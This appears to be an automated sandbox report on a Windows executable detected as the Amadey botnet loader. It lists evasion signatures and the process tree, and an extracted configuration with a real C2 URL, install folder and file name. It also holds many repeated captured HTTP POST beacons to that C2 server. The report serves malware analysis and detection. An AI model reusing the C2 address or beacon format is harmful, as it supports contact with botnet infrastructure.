Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1519852
MD5: 544ca28aa15b5ed1c6ee914b09e6f3c2
SHA1: 4b1a98399c63e9b3220cfb4b7f23f4297fae6365
SHA256: 1af2f5a32ad1db3ad373935626a38cc897ec5b717a43ec7dc2d3e507f034aa7d
Tags: exe, user-Bitsight
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadey's stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 544CA28AA15B5ED1C6EE914B09E6F3C2)
    • axplong.exe (PID: 712 cmdline: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 544CA28AA15B5ED1C6EE914B09E6F3C2)
  • axplong.exe (PID: 3312 cmdline: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 544CA28AA15B5ED1C6EE914B09E6F3C2)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source | Rule | Description | Author | Strings
00000004.00000003.1862874279.00000000049A0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000003.1358005555.0000000004C40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000002.00000002.1424184795.0000000000791000.00000040.00000001.01000000.00000008.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000002.1398782734.00000000003C1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000002.00000003.1383917764.00000000052D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
2.2.axplong.exe.790000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
0.2.file.exe.3c0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
4.2.axplong.exe.790000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

System Summary

Source: Process started
Author: frack113, Nasreddine Bencherchali
Data: Command: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6752, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe", ProcessId: 712, ProcessName: axplong.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T01:29:16.039993+0200 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.7 | 49718 | 185.215.113.16 | 80 | TCP

AV Detection

Source: file.exe, Avira: detected
Source: http://185.215.113.16/Jo89Ku7d/index.phpded, Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php:, Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpX, Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpD, Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php8, Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php32, Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpi, Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php, Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php3, Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phph, Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpp, Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000004.00000003.1862874279.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ReversingLabs: Detection: 57%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, Joe Sandbox ML: detected
Source: file.exe, Joe Sandbox ML: detected
Source: file.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: Network traffic, Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49718 -> 185.215.113.16:80
Source: Malware configuration extractor, IPs: 185.215.113.16
Source: global traffic, HTTP traffic detected:
    POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 4
    Cache-Control: no-cache
    Data Raw: 73 74 3d 73
    Data Ascii: st=s
Source: global traffic, HTTP traffic detected:
    POST /Jo89Ku7d/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.16
    Content-Length: 162
    Cache-Control: no-cache
    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 41 41 30 34 31 43 38 46 42 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFAA041C8FBFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
